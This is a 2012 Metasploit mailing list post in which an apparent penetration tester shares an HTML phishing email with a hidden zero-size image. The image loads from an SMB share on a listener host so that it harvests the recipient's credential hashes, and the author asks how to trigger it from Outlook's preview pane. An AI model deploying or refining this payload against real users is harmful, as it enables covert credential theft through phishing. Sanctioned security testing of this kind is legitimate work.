
Metasploit mailing list archives
auxiliary/server/capture/smb
From: macubergeek <macubergeek () comcast net>
Date: Fri, 30 Mar 2012 18:46:24 -0400
I've been working up a phish email for an upcoming job using: auxiliary/server/capture/smb So far this module has worked very well in html emails. Here is my code so far: 1 <html> 2 <body> 3 <img src="\\172.27.178.145\share\1.gif" style="height:0px;width:0px;"></img> 4 </body> 5 </html> This code works fine so long as the victim clicks on the email in Outlook's center pane and reads it in the pop up window but what I want is for this to fire off if the user just views the email by single clicking the email in the center pane and just viewing it in the righthand Outlook pane. Would anyone have any suggestions as to how I could do this? Jim Kelly
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- auxiliary/server/capture/smb macubergeek (Mar 30)